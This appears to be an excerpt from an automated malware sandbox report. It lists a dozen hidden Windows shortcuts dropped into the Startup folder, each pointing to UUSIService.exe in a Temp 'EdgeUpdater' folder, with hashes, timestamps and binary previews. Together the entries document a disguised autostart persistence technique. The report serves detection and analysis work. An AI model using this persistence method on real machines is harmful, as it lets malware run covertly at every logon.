Preview:	L..................F...."............G.Q....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............P........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_39988a9fa9b649bfa247210055ff49cf.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:41 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926946959159726
Encrypted:	false
SSDEEP:	24:8ZrLHLSDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8NHLSDp2l9tJRBzfNZ47/yg
MD5:	8B51FAE3011346B2C87637D5668B4E57
SHA1:	641765C6DC883B3C6C1B6580F54AA9DC348D0621
SHA-256:	0BB61681663B9A0BB82733514DECB7633B3B03CFFAADF4425C343F14A9C631E9
SHA-512:	AAE96529F839CFCD96C49777C7B16393CBBC8DA20C1AD5B6243F1D4C074A8107B11440341B5AC7E13DF9F5867D5577A63893099414A455DDF50F40DDC3490028
Malicious:	false
Preview:	L..................F...."..............R....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............%S........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3a48f3b62fd54fe39f0e27b52202af84.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:51 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925027615243238
Encrypted:	false
SSDEEP:	24:8ZbHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8tHfNDp2l9tJRBzfNZ47/yg
MD5:	BA639E6C82B87A97C251FEDFC08FBC4D
SHA1:	CF6DE57474AF0D5398894E6E3930AFF4C8AB27CF
SHA-256:	939793426C43333B2AEFFF114A4DC038764D3A079B4B76795DE41C2538D6BF20
SHA-512:	C0678C858450AB1991AFA410C570DE3F838F2787BE978E81E5E34756D0BFA6BEEF6B916BF83793BA92AC01FB65EC8479D4BD32B4C43F606F9A26F32FD8829198
Malicious:	false
Preview:	L..................F...."..............4....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3aae43b4e9a4468ba0c83637938945e1.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:19 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925195034304612
Encrypted:	false
SSDEEP:	24:8ZgHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8OHfNDp2l9tJRBzfNZ47/yg
MD5:	F154C04E1ABAF4E77B729259138EF305
SHA1:	1CD763B6BA063E53C2F0A4542A6607D55DB8FA8D
SHA-256:	0B33133ECE336D55BD2A8ACCE6324C4D9DC34F5844301BE75120D85670BFA159
SHA-512:	C175D0F4329EF4BE91178C191C917B845B32756C411C377AA286777BDCDF5C50932E1C2F486088B95BBA21DAD1957B6770FEF9E98C8F34AA6C54B567E8EF672A
Malicious:	false
Preview:	L..................F...."...........7..!....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3b0b2fd724544d12b75c23f650bcee90.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:37 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9279988716624885
Encrypted:	false
SSDEEP:	24:8Z2HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:80HfNDp2l9tJRBzfNZ47/yg
MD5:	9131FA80BC82B438BB4AD6EDAB914CFD
SHA1:	51703CB3C51D4A77EE00BE9F7110201EF564E2EC
SHA-256:	D7DC463DB80E70AAC40237CEEB7C1CB5FF45B00602B283A7782E08E19CCCAB67
SHA-512:	FCC902205E405FC40B89ECA9EA10B35955A81CF39744EEC382BCB91D06A86C386A5FAC90094A6DC850C8032679B276CA7AC6126AA9D07C948FD130CAF0129445
Malicious:	false
Preview:	L..................F...."...........o..+....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3c8ff22d03ed4179806dba08f699cae9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:04 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.930426865754894
Encrypted:	false
SSDEEP:	24:8ZIoHaDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8uoHaDp2l9tJRBzfNZ47/yg
MD5:	E3262BDE68798BEAFB5D74C391C1015C
SHA1:	BBD8410048235A223FB3890F1D17BDD61C312F06
SHA-256:	869D208FCD1F056F944CDF3654875E48EEDB875E342A70C0905FA30F4ED6A8A5
SHA-512:	E1DAC152DD96853B4D5024A2E3AB7B74041F8EB440EBB7B9AC2F837D1E0CAD6C0B7276F0B7BA3E3D4D35935E3AC202306EE10B609C87D5134435DC98FE170EBF
Malicious:	false
Preview:	L..................F....".............O<....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+}.;........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3f8a5e91d5d944b1b88a5ca92635f511.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:53 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92854792617385
Encrypted:	false
SSDEEP:	24:8ZLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:81HfNDp2l9tJRBzfNZ47/yg
MD5:	0EF5F8173721C752F8033BD862E43B2A
SHA1:	67EB5A94D2462C128A1B3C29803FA1629B0B049D
SHA-256:	F548FB2425AF2C1549753C7E3CB46E742824499EE791F8DBA7476B06494CA591
SHA-512:	BCCBA4EB96E9FDD04CD58CEC032667B1C104AD0DC0975022DAC1D88F2F397E52246C78D57E14BDB817559F1D276A7038D5DF2F775B8EB66C3563AE09534CB4D0
Malicious:	false
Preview:	L..................F...."...................0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_40a8296880184f1397aaa52465a9ca80.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:58 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.928242370451636
Encrypted:	false
SSDEEP:	24:8ZgHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8aHfNDp2l9tJRBzfNZ47/yg
MD5:	21D2D5007756B5E6ADC05BBA3E500845
SHA1:	8E9080AFA0A15F34570AABC31D2E91BDA36A60D1
SHA-256:	F260CA7BBDD3CB09BBA4908860A1A9801FF976E9A06A1F072A680BF4C52D009A
SHA-512:	56F2579CB9FAEF00ECE8F2BC1C014B073855BFF8B2631DD950EE125AE9425E1569C800A94771D5866C95FDFC4C71DF94475052686C5A3C13851AC91F4EB22A4D
Malicious:	false
Preview:	L..................F...."...................0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_41b8b9f6092a43418819142050387373.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:43 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9269551897699175
Encrypted:	false
SSDEEP:	24:8Z7HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8NHfNDp2l9tJRBzfNZ47/yg
MD5:	E971769A7239E493A2876CC340C2F587
SHA1:	F3615134E1836BD3185506288DD6BA6037DC292B
SHA-256:	25C0AF6CC19C906BC9B04A447729564E3FFD73E7FA683520ECE5E3C95CB7A231
SHA-512:	9B105A1BCF640432F4DA8244FF872F086843C7128E8B1DB6F669D15D04537A53AB2468D327167C9A37BC1C4916521668E8E9C60B6AAFD869C0B5C9388517CE4E
Malicious:	false
Preview:	L..................F...."............!......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_474eee5cd4b34cb8b74ac6d25e0dfed3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:25 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9269551897699175
Encrypted:	false
SSDEEP:	24:8ZYHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8WHfNDp2l9tJRBzfNZ47/yg
MD5:	2E44DA8B38B1465804C0F262AEDB7047
SHA1:	FCBB7BFDF3E4FB77C7535DFF3B8756123E11C0C5
SHA-256:	A779502BAC28F3F8ACEFA1F8A9DBD868E5B7074EAF469F7FD416D1C7D7A2D8E7
SHA-512:	1622963AA063E91C56003A539AD2C743F118CF755F947C884D3F7B9FD38FDB56072CDEA5CE62A32AF0B76B3EF055D7CDBD4A46DFD2824CAE0C15E965EDC8D437
Malicious:	false
Preview:	L..................F...."...........o#.$....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_47e6f15250e14047992326a53b97b7e2.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:18 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92370766002899
Encrypted:	false
SSDEEP:	24:8Z2fHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8MfHfNDp2l9tJRBzfNZ47/yg
MD5:	591787697DA685C97760605D350374CD
SHA1:	B581152DF84510783087C7D5F90CC9AD50FB920A
SHA-256:	021805077235F5BBDDCC20ADCCA8E79A9F9A56A3B3E3BA2E1399379F20F33C74
SHA-512:	839E3777ABAF6515C066FFE8FCE9A4B267FB6FB7AC25DDD5D82F29F538DDFC663368E337925C408F7E0F6F7E7A40652179EE461AB6C3428D2344E8F84D873478
Malicious:	false
Preview:	L..................F...."...........`.. ....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_485d34a5b03c48c7a76fefa3f90426a3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:47 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925605952155134
Encrypted:	false
SSDEEP:	24:8ZTHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8NHfNDp2l9tJRBzfNZ47/yg
MD5:	4A7B7EF8DCEB94F3B2262C0DDC6E4106
SHA1:	F501833BCABD9B2B0813FD082394CA2DF0F2E48B
SHA-256:	C54E4BA9B9527AA91448D431FF57EEBEA3E36B0EA554D590BFA775278ACE1668
SHA-512:	7F6B8D35604458B9818ABBFE9EA571A7B2C26EDD208E36292E754649F34D70E7DB4DDE558E81306A534DE14DD527C0CE21BB852DEA13DF083FA6AA4AD1ECF8C0
Malicious:	false
Preview:	L..................F....".............".....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_4c566573618a4121a02b11bb805215a7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:14 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.913835756027753
Encrypted:	false
SSDEEP:	24:8Zs6HoDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8fHoDp2l9tJRBzfNZ47/yg
MD5:	AECE2E23DA9498DF481739376AA090D0
SHA1:	AD59EFF587CD7D25A665A8F1A60D616B80534CFC
SHA-256:	7E4619E7555567717F444157BC780C2F9CABDF6C490F6C040680855D19C54FCA
SHA-512:	6A73026AE40C034CDDB99E2A86299A75F62BF639DEE1B6228AE5811D6B0F97A10D1D814D22AE9026ED4970EE4F79AEE92900E9C5409C3FE0F694194BEDE05B25
Malicious:	false
Preview:	L..................F...."...........s.9B....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........3..B........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_4dbf829e39474c98829bba8ff6e9ad45.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:57 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925416728875657
Encrypted:	false
SSDEEP:	24:8ZQyH5Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:82yH5Dp2l9tJRBzfNZ47/yg
MD5:	6195351867A13994048587E7407957EB
SHA1:	FD6D31BEF2A1D001E80CA52D6FEA0D65DA20A4C3
SHA-256:	8D058C24EC708FB3E2279592EC3A6506E5B78D4E257606236C619AD669A0F927
SHA-512:	E67A7288BCA1933A96612C276529557DBA7FF987658D3FEFDD44B0C7CD2736393E2412FDF577A58D99FC148A7E515DB94F80E93737B4D1BC0F6DB77C2D34CCCD
Malicious:	false
